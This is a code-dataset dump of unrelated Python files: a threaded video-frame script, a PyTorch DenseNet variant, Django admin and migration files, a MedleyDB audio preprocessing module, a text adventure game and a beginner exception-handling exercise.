t43 = threading.Thread(target=detect, args=(imgs[42], i + 43))
t44 = threading.Thread(target=detect, args=(imgs[43], i + 44))
t45 = threading.Thread(target=detect, args=(imgs[44], i + 45))
t46 = threading.Thread(target=detect, args=(imgs[45], i + 46))
t47 = threading.Thread(target=detect, args=(imgs[46], i + 47))
t48 = threading.Thread(target=detect, args=(imgs[47], i + 48))
t49 = threading.Thread(target=detect, args=(imgs[48], i + 49))
t50 = threading.Thread(target=detect, args=(imgs[49], i + 50))
t51 = threading.Thread(target=detect, args=(imgs[50], i + 51))
t52 = threading.Thread(target=detect, args=(imgs[51], i + 52))
t53 = threading.Thread(target=detect, args=(imgs[52], i + 53))
t54 = threading.Thread(target=detect, args=(imgs[53], i + 54))
t55 = threading.Thread(target=detect, args=(imgs[54], i + 55))
t56 = threading.Thread(target=detect, args=(imgs[55], i + 56))
t57 = threading.Thread(target=detect, args=(imgs[56], i + 57))
t58 = threading.Thread(target=detect, args=(imgs[57], i + 58))
t59 = threading.Thread(target=detect, args=(imgs[58], i + 59))
t60 = threading.Thread(target=detect, args=(imgs[59], i + 60))
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
t6.start()
t7.start()
t8.start()
t9.start()
t10.start()
t11.start()
t12.start()
t13.start()
t14.start()
t15.start()
t16.start()
t17.start()
t18.start()
t19.start()
t20.start()
t21.start()
t22.start()
t23.start()
t24.start()
t25.start()
t26.start()
t27.start()
t28.start()
t29.start()
t30.start()
t31.start()
t32.start()
t33.start()
t34.start()
t35.start()
t36.start()
t37.start()
t38.start()
t39.start()
t40.start()
t41.start()
t42.start()
t43.start()
t44.start()
t45.start()
t46.start()
t47.start()
t48.start()
t49.start()
t50.start()
t51.start()
t52.start()
t53.start()
t54.start()
t55.start()
t56.start()
t57.start()
t58.start()
t59.start()
t60.start()
t1.join()
t2.join()
t3.join()
t4.join()
t5.join()
t6.join()
t7.join()
t8.join()
t9.join()
t10.join()
t11.join()
t12.join()
t13.join()
t14.join()
t15.join()
t16.join()
t17.join()
t18.join()
t19.join()
t20.join()
t21.join()
t22.join()
t23.join()
t24.join()
t25.join()
t26.join()
t27.join()
t28.join()
t29.join()
t30.join()
t31.join()
t32.join()
t33.join()
t34.join()
t35.join()
t36.join()
t37.join()
t38.join()
t39.join()
t40.join()
t41.join()
t42.join()
t43.join()
t44.join()
t45.join()
t46.join()
t47.join()
t48.join()
t49.join()
t50.join()
t51.join()
t52.join()
t53.join()
t54.join()
t55.join()
t56.join()
t57.join()
t58.join()
t59.join()
t60.join()
# Loading the video into python
cap = cv2.VideoCapture('bunny.mp4')
# Making a folder for the edited frames
try:
if not os.path.exists('data'):
os.makedirs('data')
except OSError:
print ('Error: Creating directory of data')
currentFrame = 0
imgs = []
height = 0
width = 0
n = 0
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
if not ret:
if(len(imgs) != 0):
for i in range(len(imgs)):
detect(img[i], currentFrame)
break
# Converting the frame to grayscale and adding it to a list
name = './data/frame' + str(currentFrame) + '.jpg'
print ('Slicing and converting to grayscale...' + name)
imgs.append(rgb2gray(frame))
if(currentFrame % 60 == 0 and currentFrame != 0):
thread((currentFrame / 60) - 1, imgs)
imgs = []
# Find height and width
height, width, _ = frame.shape
currentFrame += 1
image_folder = 'data'
images = [img for img in os.listdir(image_folder) if img.endswith(".jpg")]
frame = cv2.imread(os.path.join(image_folder, images[0]))
height, width, _ = frame.shape
exportVid()
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows() | [
"[email protected]"
] | |
8bfa5c02a3089abb03156a6609bfed1a989474e9 | d5f8ca3c13f681d147b7614f1902df7ba34e06f9 | /Graduate/model/densenet.py | 38359413ab29892a7c8f412c5fc1741039a65696 | [] | no_license | hhjung1202/OwnAdaptation | 29a6c0a603ab9233baf293096fb9e7e956647a10 | 50805730254419f090f4854387be79648a01fbb4 | refs/heads/master | 2021-06-25T22:31:15.437642 | 2020-11-26T18:19:55 | 2020-11-26T18:19:55 | 176,670,379 | 1 | 0 | null | 2020-06-11T07:35:55 | 2019-03-20T06:36:19 | Python | UTF-8 | Python | false | false | 7,429 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
from torch import Tensor
import itertools
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.size(0), -1)
class _Gate_selection(nn.Sequential):
phase = 2
def __init__(self, num_input_features, growth_rate, count, reduction=4):
super(_Gate_selection, self).__init__()
self.actual = (count+1) // 2
LongTensor = torch.cuda.LongTensor if torch.cuda.is_available() else torch.LongTensor
self.init = LongTensor([i for i in range(num_input_features)]).view(1, -1)
s = num_input_features
arr = []
for j in range(count):
arr += [[i for i in range(s, s + growth_rate)]]
s+=growth_rate
self.arr = LongTensor(arr)
self.avg_pool = nn.AdaptiveAvgPool2d(1)
channels = num_input_features + growth_rate * count
self.fc1 = nn.Linear(channels, channels//reduction)
self.relu = nn.ReLU(inplace=True)
self.fc2 = nn.Linear(channels//reduction, count)
self.sigmoid = nn.Sigmoid()
self.flat = Flatten()
def forward(self, x, x_norm):
b, _, w, h = x_norm.size()
out = self.avg_pool(x_norm) # batch, channel 합친거, w, h
out = self.flat(out)
out = self.relu(self.fc1(out))
out = self.sigmoid(self.fc2(out))
_, sort = out.sort()
indices = sort[:,:self.actual] # batch, sort # shuffle
indices = indices[:, torch.randperm(indices.size(1))]
select = self.init.repeat(b,1)
select = torch.cat([select, self.arr[indices].view(b,-1)], 1)
select = select.view(select.size(0), -1, 1, 1).repeat(1,1,w,h)
x = x.gather(1, select)
return x
class _Bottleneck(nn.Sequential):
def __init__(self, num_input_features, growth_rate, count=1):
super(_Bottleneck, self).__init__()
self.norm1 = nn.BatchNorm2d(num_input_features)
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Conv2d(num_input_features, 4 * growth_rate,
kernel_size=1, stride=1, bias=False)
self.norm2 = nn.BatchNorm2d(4 * growth_rate)
self.conv2 = nn.Conv2d(4 * growth_rate, growth_rate,
kernel_size=3, stride=1, padding=1, bias=False)
self.count = count
def forward(self, x):
if isinstance(x, Tensor):
x = [x]
out = torch.cat(x,1)
out = self.norm1(out)
out = self.relu(out)
out = self.conv1(out)
out = self.norm2(out)
out = self.relu(out)
out = self.conv2(out)
return out
class _Basic(nn.Sequential):
def __init__(self, num_input_features, growth_rate):
super(_Basic, self).__init__()
self.norm1 = nn.BatchNorm2d(num_input_features)
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Conv2d(num_input_features, growth_rate,
kernel_size=3, stride=1, padding=1, bias=False)
self.count = count
def forward(self, x):
if isinstance(x, Tensor):
x = [x]
out = torch.cat(x,1)
out = self.norm1(out)
out = self.relu(out)
out = self.conv1(out)
return out
class _DenseLayer(nn.Module):
def __init__(self, num_input_features, growth_rate, num_layers, Block):
super(_DenseLayer, self).__init__()
self.num_layers = num_layers
self.init_block = Block(num_input_features, growth_rate)
for i in range(1, num_layers):
j = (i-1)//2 + 1
setattr(self, 'layer{}'.format(i), Block(num_input_features + growth_rate * j, growth_rate))
setattr(self, 'norm{}'.format(i), nn.BatchNorm2d(num_input_features + growth_rate * (i+1)))
setattr(self, 'gate{}'.format(i), _Gate_selection(num_input_features, growth_rate, i+1, reduction=4))
def forward(self, x):
out = self.init_block(x)
x = [x] + [out]
out = torch.cat(x,1)
for i in range(1, self.num_layers):
out = getattr(self, 'layer{}'.format(i))(out)
x += [out]
x_cat = torch.cat(x,1)
x_norm = getattr(self, 'norm{}'.format(i))(x_cat)
out = getattr(self, 'gate{}'.format(i))(x_cat, x_norm)
return x_cat
class _Transition(nn.Sequential):
def __init__(self, num_input_features, tr_features):
super(_Transition, self).__init__()
self.norm = nn.BatchNorm2d(tr_features)
self.relu = nn.ReLU(inplace=True)
self.conv = nn.Conv2d(tr_features, num_input_features // 2,
kernel_size=1, stride=1, bias=False)
self.pool = nn.AvgPool2d(kernel_size=2, stride=2)
def forward(self, x):
# out = torch.cat(x,1)
out = self.norm(x)
out = self.relu(out)
out = self.conv(out)
out = self.pool(out)
return out
class DenseNet(nn.Module):
def __init__(self, growth_rate=12,
num_init_features=24, num_classes=10, is_bottleneck=True, layer=28):
super(DenseNet, self).__init__()
if layer is 28:
block_config=[4,4,4]
elif layer is 40:
block_config=[6,6,6]
elif layer is 52:
block_config=[8,8,8]
elif layer is 64:
block_config=[10,10,10]
if is_bottleneck:
Block = _Bottleneck
else:
Block = _Basic
block_config = [2*x for x in block_config]
self.features = nn.Sequential()
self.features.add_module('conv0', nn.Conv2d(3, num_init_features, kernel_size=3, stride=1, padding=1, bias=False))
num_features = num_init_features
for i in range(len(block_config)):
self.features.add_module('layer%d' % (i + 1), _DenseLayer(num_features, growth_rate, block_config[i], Block))
tr_features = num_features + block_config[i] * growth_rate
num_features = num_features + block_config[i] * growth_rate // 2
if i != len(block_config) - 1:
self.features.add_module('transition%d' % (i + 1), _Transition(num_features, tr_features))
num_features = num_features // 2
# Final batch norm
self.norm = nn.BatchNorm2d(tr_features)
self.relu = nn.ReLU(inplace=True)
self.pool = nn.AvgPool2d(kernel_size=8, stride=1)
self.fc = nn.Linear(tr_features, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.constant_(m.bias, 0)
# Linear layer
# Official init from torch repo.
def forward(self, x):
out = self.features(x)
# out = torch.cat(out,1)
out = self.norm(out)
out = self.relu(out)
out = self.pool(out)
out = out.view(out.size(0), -1)
out = self.fc(out)
return out
if __name__=='__main__':
x = torch.randn(4,3,32,32)
model = DenseNet(growth_rate=12, num_init_features=24, num_classes=10, is_bottleneck=True, layer=40)
y = model(x)
print(y.size()) | [
"[email protected]"
] | |
353d23ee1d8f260fdba75771dad1edcc93f3b402 | f09f92fb6d46d75ce92d3e1183adc68b8087a56e | /sandbox.py | b4af84ff90854b543f72b9ef82e6a7468f1b214b | [] | no_license | nikitafainberg/darkWorldAuth | d7f79ebb04ec0279c3b4b69a25e746d445a4ed19 | 24547eda0622fe15a1b3cfed674f2660623c2a0d | refs/heads/master | 2023-08-29T11:04:35.954817 | 2021-11-13T23:26:04 | 2021-11-13T23:26:04 | 427,531,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | from DB_manger import dbConnector
if __name__ == '__main__':
db_connector = dbConnector()
users = db_connector.get_user_by_username("nick")[0]
print(users)
| [
"[email protected]"
] | |
4cb3844e79b7b04d524f902a1436ea166712750d | 7bc1d2a995ce6488c7dd20909a6f9443d6d8ced8 | /admin.py | f9970ac554b7883eb5ab7ee1f153581bbdd2be7d | [] | no_license | strategy2231/django_learn | dd4f7d1bd77157b893a8ea2d8355e980898687f5 | 9b9544c24d42892acef53943eb707bc5b8ca48c3 | refs/heads/master | 2021-01-12T16:01:43.756219 | 2016-10-25T18:45:48 | 2016-10-25T18:45:48 | 71,918,737 | 0 | 0 | null | 2016-10-25T18:40:31 | 2016-10-25T16:50:45 | Python | UTF-8 | Python | false | false | 612 | py |
# Register your models here.
from django.contrib import admin
from restaurants.models import Restaurant, Food,Comment
class RestaurantAdmin(admin.ModelAdmin):
list_display = ('name', 'phone_number', 'address','date')
search_fields = ('name',)
class FoodAdmin(admin.ModelAdmin):
list_display = ('name', 'restaurant', 'price','is_spicy','comment','date')
list_filter = ('is_spicy',)
#fields = ('price','restaurant')
search_fields = ('name',)
ordering = ('-price',)
admin.site.register(Restaurant,RestaurantAdmin)
admin.site.register(Food,FoodAdmin)
admin.site.register(Comment) | [
"[email protected]"
] | |
da39ff189fd2c0d2ba922949117085f9ce98e2fa | 85be450530138c8b66c513c4283bcb1d58caeeb0 | /apps/funcionarios/migrations/0005_funcionario_imagem.py | bc149c39e59bf25051a7e604642ca132a0e9a4c1 | [] | no_license | fgomesc/gestao_teste | 6be81a263fddb1b1e5d6a2d768387fc024e9bdc3 | b2890ffa99361dd30b002706c94d1e5299651315 | refs/heads/master | 2021-09-25T06:21:51.602878 | 2021-09-14T18:27:13 | 2021-09-14T18:27:13 | 236,030,673 | 0 | 0 | null | 2021-06-10T22:31:09 | 2020-01-24T15:42:59 | JavaScript | UTF-8 | Python | false | false | 446 | py | # Generated by Django 2.1.1 on 2018-11-17 12:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('funcionarios', '0004_auto_20181029_2313'),
]
operations = [
migrations.AddField(
model_name='funcionario',
name='imagem',
field=models.ImageField(default=1, upload_to='fotos'),
preserve_default=False,
),
]
| [
"[email protected]"
] | |
38ed67962462a2b1c17e8f0180e3df363f2c1773 | fb3630fa338b304cd951b94375faf6c55a94488e | /msu_map/raw/images/convertPNG.py | bc9ca24e740c4e7995f1d2b56842e474db3cf325 | [] | no_license | Outtascope/MSUPaths_iPhone | 9001fccceccfed791a3d41846eb47424d847890e | 062f20860e949bea72872d912da046774ce6e0a8 | refs/heads/master | 2020-12-07T15:32:38.461826 | 2015-06-18T02:27:02 | 2015-06-18T02:27:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | from PIL import Image
from glob import glob
for imgFile in glob("./*.png"):
try:
img = Image.open(imgFile)
img.save(imgFile,"PNG")
except IOError, msg:
print "Fail at: ", imgFile, " :", msg
| [
"[email protected]"
] | |
53a4aee6671f14f354522c8971d2917b12424013 | acb5c517f02a6643e276b9c3ddf1a23bf15afc29 | /src/data/data_prep.py | a55851f23be96405cce7041f8149f90d14511382 | [] | no_license | razvannica/instrument-recognition | 13018ec6b403765dc452b9c961c9222967f041ee | a94866b67cc9646ed4633b761dd3440e14ec5f93 | refs/heads/master | 2020-03-20T07:06:47.404105 | 2018-06-13T22:02:58 | 2018-06-13T22:02:58 | 137,271,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,306 | py | import numpy as np
import os
import cPickle
import pandas as pd
import yaml
import wave
import struct
import gc
from scipy.io import wavfile
from scipy.io import savemat
import copy
import patch_label
"""
This file contains all scripts necessary for preparing data.
The code in this file reads all wav files, metadata and annotations for mixed
tracks. And then it takes patches of x seconds each from each track and labels
them.
Finally the resulting raw data is saved to several mat files, each containing
y tracks.
WARNING: If save_size is set to 20 in prep_data(), it takes 2 to 10 min to
read data for one mat file, 3GB memory to keep program running, and
1.5GB disk storage to save one mat file.
If you find yourself out of memory, set save_size to a lower value.
Still looking for more efficient ways to store data.
Need discussion: Too many kinds of instruments (over 80) if use all
"""
def backup_wavfile_reader(fpath):
"""Read wav files when scipy wavfile fail to read.
Args:
fpath (str): path to the wav file to read
Returns:
numpy array: data read from wav file
"""
f = wave.open(fpath, 'rb')
res = []
for i in xrange(f.getnframes()):
frame = f.readframes(1)
x = struct.unpack('=h', frame[:2])[0]
y = struct.unpack('=h', frame[2:])[0]
res.append([x, y])
return np.array(res)
def read_mixed_from_files(dpath, dlist, pickle_file=None):
"""Read the mixed track files and return as dictionary
Args:
dpath (str): path to the directory "MedleyDB/Audio"
dlist (list): list of str, each for one mixed track file
Returns:
dict: in the format of {song_name(string): song_data(numpy array)}
song_data two rows n cols. Each row is a channel, each col is a
time frame.
"""
res = dict()
for i in dlist:
fpath = os.path.join(dpath, i, '{}_MIX.wav'.format(i))
try:
data = wavfile.read(fpath)[1].T
except:
print "Warning: can't read {}, switch to backup reader". \
format(fpath)
data = backup_wavfile_reader(fpath).T
res[i] = np.float32(data)
if pickle_file is not None:
with open(pickle_file, 'w') as f:
cPickle.dump(res, f)
return res
def normalize_data(data):
"""Normalize data with respect to each file in place
For each file, normalize each column using standardization
Args:
data (dict): in format of {song_name(string): song_data(numpy array)}
Returns:
N/A
"""
for k in data.keys():
mean = data[k].mean(axis=1).reshape(2, 1)
std = data[k].std(axis=1).reshape(2, 1)
data[k] = np.float32(((data[k] - mean) / std))
def read_activation_confs(path, pickle_file=None):
"""Read the annotation files of activation confidence, return as dictionary
Args:
path (string): path to the directory "MedleyDB"
Returns:
dict: in the format of {song_name(string): annotation(pandas df)}
"""
dpath = os.path.join(path, 'Annotations', 'Instrument_Activations',
'ACTIVATION_CONF')
dlist = os.listdir(dpath)
res = dict()
for i in dlist:
fpath = os.path.join(dpath, i)
annotation = pd.read_csv(fpath, index_col=False)
k = i[:-20].split('(')[0]
k = k.translate(None, "'-")
res[k] = annotation
if pickle_file is not None:
with open(pickle_file, 'w') as f:
cPickle.dump(res, f)
return res
def read_meta_data(path, pickle_file=None):
"""Read the metadata for instrument info, return as dictionary
Args:
path (string): path to the directory "MedleyDB"
Returns:
dict: in the format of {song_name(string): instrument_map(dict)}
instrument_map is of the format eg: {'S01': 'piano'}
"""
dpath = os.path.join(path, "Audio")
dlist = os.listdir(dpath)
res = dict()
for i in dlist:
fpath = os.path.join(dpath, i, '{}_METADATA.yaml'.format(i))
with open(fpath, 'r') as f:
meta = yaml.load(f)
instrument = {k: v['instrument'] for k, v in meta['stems'].items()}
res[i] = instrument
if pickle_file is not None:
with open(pickle_file, 'w') as f:
cPickle.dump(res, f)
return res
def groupMetaData(meta, instGroup):
"""Match instrument number in annotation with real instrument name in meta.
Args:
meta (dict): in the format of {song_name(string): instrument_map(dict)}
instrument_map is of the format eg: {'S01': 'piano'}
instGroup (dict): {instrument: instrumentGroup} eg: {'piano': 'struck'}
Returns:
groupedMeta (dict): in the format of
{song_name(string): instrument_map(dict)}
"""
groupedMeta = copy.deepcopy(meta)
for songName in groupedMeta.keys():
for stemName in groupedMeta[songName]:
groupedMeta[songName][stemName] = instGroup[groupedMeta[songName]
[stemName]]
return groupedMeta
def match_meta_annotation(meta, annotation):
"""Match instrument number in annotation with real instrument name in meta.
Note: In the annotation of one mixed track, there can be multiple instances
of the same instrument, in which case the same column name appears
multiple times in the pandas df
Args:
meta (dict): in the format of {song_name(string): instrument_map(dict)}
instrument_map is of the format eg: {'S01': 'piano'}
annotation (dict): {song_name(string): annotation(pandas df)}
Returns:
list: containing all instruments involved, sorted in alphebic order
"""
assert(len(meta) == len(annotation))
all_instruments = set()
for k, v in annotation.items():
v.rename(columns=meta[k], inplace=True)
all_instruments.update(v.columns[1:])
return sorted(list(all_instruments))
def split_music_to_patches(data, annotation, inst_map, label_aggr, length=1,
sr=44100, time_window=100.0, binary=False,
threshold=None):
"""Split each music file into (length) second patches and label each patch
Note: for each music file, the last patch that is not long enough is
abandoned.
And each patch is raveled to have only one row.
Args:
data(dict): the raw input data for each music file
annotation(dict): annotation for each music file
calculated as average confidence in this time period
inst_map(dict): a dictionary that maps a intrument name to its correct
position in the sorted list of all instruments
label_aggr(function): a function that defines the way labels for each
sample chunk is generated, default is np.mean
length(int): length of each patch, in seconds
sr (int): sample rate of raw audio
time_window(float): time windows for average (in milliseconds)
Returns:
dict: {'X': np array for X, 'y': np array for y, 'present': np array
of indicators for whether the instrument is present in the
track from which the patch is taken}
"""
res = []
patch_size = sr * length
for k, v in data.items():
for i, e in enumerate(xrange(0, v.shape[1] - patch_size, patch_size)):
patch = v[:, e:patch_size+e].ravel()
sub_df = annotation[k][(i * length <= annotation[k].time) &
(annotation[k].time < (i + 1) * length)]
if label_aggr is not None:
inst_conf = sub_df.apply(label_aggr, 0).drop('time')
else:
inst_conf = patch_label.patch_label(0, length, time_window,
sub_df, binary,
threshold).iloc[0]
label = np.zeros(len(inst_map), dtype='float32')
is_present = np.zeros(len(inst_map), dtype='float32')
for j in inst_conf.index:
temp = inst_conf[j]
# if there are two columns of the same instrument, take maximum
if isinstance(temp, pd.Series):
temp = temp.max()
label[inst_map[j]] = temp
is_present[inst_map[j]] = 1.0
res.append((patch, label, is_present, k, (i*length, (i+1)*length)))
X, y, present, song_name, time = zip(*res)
return {'X': np.array(X), 'y': np.array(y), 'present': np.array(present),
'song_name': song_name, 'time': np.array(time, dtype='float32')}
def prep_data(in_path, out_path=os.curdir, save_size=20, norm_channel=False,
label_aggr=None, start_from=0, groupID='Group 4', **kwargs):
"""Prepare data for preprocessing
Args:
in_path(str): the path for "MedleyDB"
out_path(str): the path to save pkl files, default to be current
save_size(int): the number of wav files contained in each mat
file. Large save_size requires large memory
norm_channel(bool): whehter to normalize each channel locally
label_aggr(function): a function that defines the way labels for each
sample chunk is generated, default is np.mean
start_from(int): the order of file in alphebic order to start reading
from. All files before that are ignored. Used to
continue from the file last read.
kwargs (dict): additional arguments to pass to split_music_to_patches
Returns:
N/A
"""
# save parameters for this run
to_write = ['{} = {}'.format(k, v) for k, v in locals().items()]
with open(os.path.join(out_path, 'config.txt'), 'wb') as f:
f.write('\n'.join(to_write))
# read annotations and match with metadata
anno_pkl = os.path.join(out_path, 'anno_label.pkl')
annotation = read_activation_confs(in_path)
meta = read_meta_data(in_path)
# group instruments in metadata
instGrouping = pd.read_csv('./instGroup.csv')
groupLookup = dict(zip(instGrouping['Instrument'].values,
instGrouping[groupID].values))
meta = groupMetaData(meta, groupLookup)
all_instruments = match_meta_annotation(meta, annotation)
if not os.path.exists(anno_pkl):
with open(anno_pkl, 'w') as f:
cPickle.dump(annotation, f)
# create and save song_instr mapping
song_instr = {}
for k, v in annotation.items():
song_instr[k] = set(v.columns[1:])
with open(os.path.join(out_path, 'song_instr.pkl'), 'wb') as f:
cPickle.dump(song_instr, f)
# save all instrument list to file
with open('all_instruments.txt', 'wb') as f:
f.write('\n'.join(all_instruments))
# get a dictionary mapping all instrument to sorted order
all_instruments_map = {e: i for i, e in enumerate(all_instruments)}
print 'Total number of labels = {}'.format(len(all_instruments))
# read mixed tracks
dpath = os.path.join(in_path, "Audio")
dlist = sorted(os.listdir(dpath)) # get list of tracks in sorted order
# write the list to file as reference for song_names in data
with open(os.path.join(out_path, 'song_name_list.txt'), 'wb') as f:
f.write('\n'.join(dlist))
# get a mapping of song names to their sorted order
song_name_map = {e: i for i, e in enumerate(dlist)}
for i in range(max(start_from, 0), len(dlist), save_size):
tdlist = dlist[i:i+save_size]
data = read_mixed_from_files(dpath, tdlist)
print 'finished reading file'
if norm_channel:
normalize_data(data)
print 'finished normalizing data'
# split to x second patches
for k, v in data.items():
patched_data = split_music_to_patches({k: v}, annotation,
all_instruments_map,
label_aggr, **kwargs)
temp_l = len(patched_data['song_name'])
patched_data['song_name'] = np.array([song_name_map[e] for e in
patched_data['song_name']],
dtype='float32'). \
reshape(temp_l, 1)
# save patches to file
patches_save_path = os.path.join(out_path, '{}_patched.mat'.
format(k))
if not os.path.exists(patches_save_path):
savemat(patches_save_path, patched_data)
del patched_data
print 'finished taking patches of {}'.format(k)
del data
gc.collect()
print 'finished {} of {}'.format(min(i+save_size, len(dlist)),
len(dlist))
def main():
root = os.path.abspath(os.sep)
in_path = os.path.join(root, 'Volumes', 'VOL2', 'MedleyDB')
prep_data(in_path, length=1, time_window=100.0, binary=False,
threshold=None)
| [
"[email protected]"
] | |
045e3b79ee98a308915d4259f3453d80f710f82a | 2fdc236b11ad16052ceab7f566657fca41f1f45e | /ex43.py | 6a274bbbb087040ef06becf94b2fcb75158b37d6 | [] | no_license | HeshamBahgat/Learn-Python-The-Hard-Way | 6bc155e18efaf24cdf90a591149b8e97b3926337 | 67a6d1320eb9964f6db0cf435b1f319cb14c7a3b | refs/heads/master | 2020-06-03T01:05:11.992987 | 2019-06-11T13:27:34 | 2019-06-11T13:27:34 | 191,370,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,711 | py | from sys import exit
from random import randint
from textwrap import dedent
## adventure game
class Scene(object):
def enter(self):
print("This scene is not yet configured")
print("Subclass it and implement enter().")
exit(1)
class Enigne(object):
def __init__(self, scene_map):
self.scene_map = scene_map
def play(self):
current_scene = self.scene_map.opening_scene()
last_scene = self.scene_map.next_scene("finished")
while current_scene != last_scene:
next_scene_name = current_scene.enter()
current_scene = self.scene_map.next_scene(next_scene_name)
# be sure to print out the last scene
current_scene.enter()
class Death(Scene):
quips = [
"You died. You kinda suck at this.",
"Your Mom would be pround...if she were smarter."
"Such a luser."
"I have a small puppy that's better st this."
"You're worse than your Dad's jokes."]
def enter(self):
print(Death.quips[randint(0, len(self.quips)-1)])
exit(1)
class CentralCorridor(Scene):
def enter(self):
print(dedent('''
The Gothons of planet percal #25 have invaded your ship and destroyed your entire crew.
You are the last surviving member and your last mission is to get the neutron destruct bomb from the weapon Armory,
put it in the bridge, and blow the shio up after getting into an escape pod
You're running down the central corridor to the weapons Armory when a Gothon jumps out.
red scaly skin, dark grimy teeth, and evil clown costume flowing around his hate filled body. He's blocking the door to the Armory
and about to pull a weapon to blast you'''))
action = input("> ")
if action == "shoot!":
print(dedent("""
Quick on the draw you yank out your blaster and fire
it at the Gothon. His clown costume is flowing and
moving around his body, which throws off your aim.
Your laser hits his costume but misses him entirely.
This completely ruins his brand new costume his mother
bought him, which makes him fly into an insane rage
and blast you repeatedly in the face until you are
dead. Then he eats you.
"""))
return "Death"
elif action == "tell a joke":
print(dedent("""
Lucky for you they made you learn Gothon insults in
the academy. You tell the one Gothon joke you know:
Lbhe zbgure vf fb sng, jura fur fvgf nebhaq gur ubhfr,
fur fvgf nebhaq gur ubhfr. The Gothon stops, tries
not to laugh, then busts out laughing and can't move.
While he's laughing you run up and shoot him square in
the head putting him down, then jump through the
Weapon Armory door.
"""))
return 'laser_weapon_armory'
else:
print("Does NOT Compute!")
return "central_corridor"
class LaserWeaponArmory(Scene):
def enter(self):
print(dedent("""
You do a dive roll into the Weapon Armory, crouch and scan
the room for more Gothons that might be hiding. It's dead
quiet, too quiet. You stand up and run to the far side of
the room and find the neutron bomb in its container.
There's a keypad lock on the box and you need the code to
get the bomb out. If you get the code wrong 10 times then
the lock closes forever and you can't get the bomb. The
code is 3 digits.
"""))
code = f"{randint(1,9)}{randint(1,9)}{randint(1,9)}"
print (code)
guess = input("[keypad> ]")
guesses = 0
while guess != code and guesses < 10:
print("BZZZZEDDD")
guesses += 1
guess = input("[keypad> ]")
if guess == code:
print(dedent("""
The container clicks open and the seal breaks, letting
gas out. You grab the neutron bomb and run as fast as
you can to the bridge where you must place it in the
right spot.
"""))
return 'the_bridge'
else:
print(dedent("""
The lock buzzes one last time and then you hear a
sickening melting sound as the mechanism is fused
together. You decide to sit there, and finally the
Gothons blow up the ship from their ship and you die.
"""))
return 'death'
class TheBridge(Scene):
def enter(self):
print(dedent("""
You burst onto the Bridge with the netron destruct bomb
under your arm and surprise 5 Gothons who are trying to
take control of the ship. Each of them has an even uglier
clown costume than the last. They haven't pulled their
weapons out yet, as they see the active bomb under your
arm and don't want to set it off.
"""))
action = input("> ")
if action == "throw the bomb":
print(dedent("""
In a panic you throw the bomb at the group of Gothons
and make a leap for the door. Right as you drop it a
Gothon shoots you right in the back killing you. As
you die you see another Gothon frantically try to
disarm the bomb. You die knowing they will probably
blow up when it goes off.
"""))
return 'death'
elif action == "slowly place the bomb":
print(dedent("""
You point your blaster at the bomb under your arm and
the Gothons put their hands up and start to sweat.
You inch backward to the door, open it, and then
carefully place the bomb on the floor, pointing your
blaster at it. You then jump back through the door,
punch the close button and blast the lock so the
Gothons can't get out. Now that the bomb is placed
you run to the escape pod to get off this tin can.
"""))
return 'escape_pod'
else:
print("DOES NOT COMPUTE!")
return "the_bridge"
class EscapePod(Scene):
def enter(self):
def enter(self):
print(dedent("""
You rush through the ship desperately trying to make it to
the escape pod before the whole ship explodes. It seems
like hardly any Gothons are on the ship, so your run is
clear of interference. You get to the chamber with the
escape pods, and now need to pick one to take. Some of
them could be damaged but you don't have time to look.
There's 5 pods, which one do you take?
"""))
good_pod = randint(1, 5)
print(good_pod)
guess = input("[pod #]> ")
if int(guess) != good_pod:
print(dedent("""
You jump into pod {guess} and hit the eject button.
The pod escapes out into the void of space, then
implodes as the hull ruptures, crushing your body into
jam jelly.
"""))
return 'death'
else:
print(dedent("""
You jump into pod {guess} and hit the eject button.
The pod easily slides out into space heading to the
planet below. As it flies to the planet, you look
back and see your ship implode then explode like a
bright star, taking out the Gothon ship at the same
time. You won!
"""))
return 'finished'
class Finished(Scene):
def enter(self):
print("You won! Good job")
return "Finished"
class Map(object):
scenes = {
'central_corridor': CentralCorridor(),
'laser_weapon_armory': LaserWeaponArmory(),
'the_bridge': TheBridge(),
'escape_pod': EscapePod(),
'death': Death(),
'finished': Finished(),
}
def __init__(self, start_scene):
self.start_scene = start_scene
def next_scene(self, scene_name):
va1 = Map.scenes.get(scene_name)
return va1
def opening_scene(self):
return self.next_scene(self.start_scene)
a_map = Map('central_corridor')
a_game = Enigne(a_map)
a_game.play()
"""
1- map class will store all scene as a dic and each scene has a key to call the scene as a function
2- engine will control the map class, two variables will be created then seneses will be callen depends on these variables
3- theses variables will use method from map class and sene dic
""" | [
"[email protected]"
] | |
eea33ae817b3fd5ed3cb9850e88cdc7f95ce66d3 | 2676b16638e5495fd85aa0ab1bb34a4869373015 | /exceptions.py | 0494599441bd3a56abae9eab930a1c58bf29a917 | [] | no_license | ryrysmiley/compsci230 | c9053f24fa3bec8ce84f92682b6a882c8e67c9fd | 0d4ece995d5c1b654dd230ada6a480198f4b926a | refs/heads/main | 2023-01-24T14:07:13.209862 | 2020-12-08T01:48:48 | 2020-12-08T01:48:48 | 315,526,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 779 | py | """
try:
f=open("test.txt")
print(f.read())
except FileNotFoundError:
print("File doesn't exist")
try:
x=int(input())
print(2/x)
except ValueError:
print("that is not an int")
except ZeroDivisionError:
print("can't divide by zero")
"""
user_input = ''
while user_input != "q":
try:
user_age=int(input("age"))
if user_age<=0:
raise ValueError("Invalid age")
print(user_age)
weight=int(input("weight"))
if weight<=0:
raise ValueError("Invalid weight")
print(weight)
height=int(input("height"))
if height<=0:
raise ValueError("Invalid height")
print(height)
except ValueError as e:
print(e)
user_input = input("q to quit")
| [
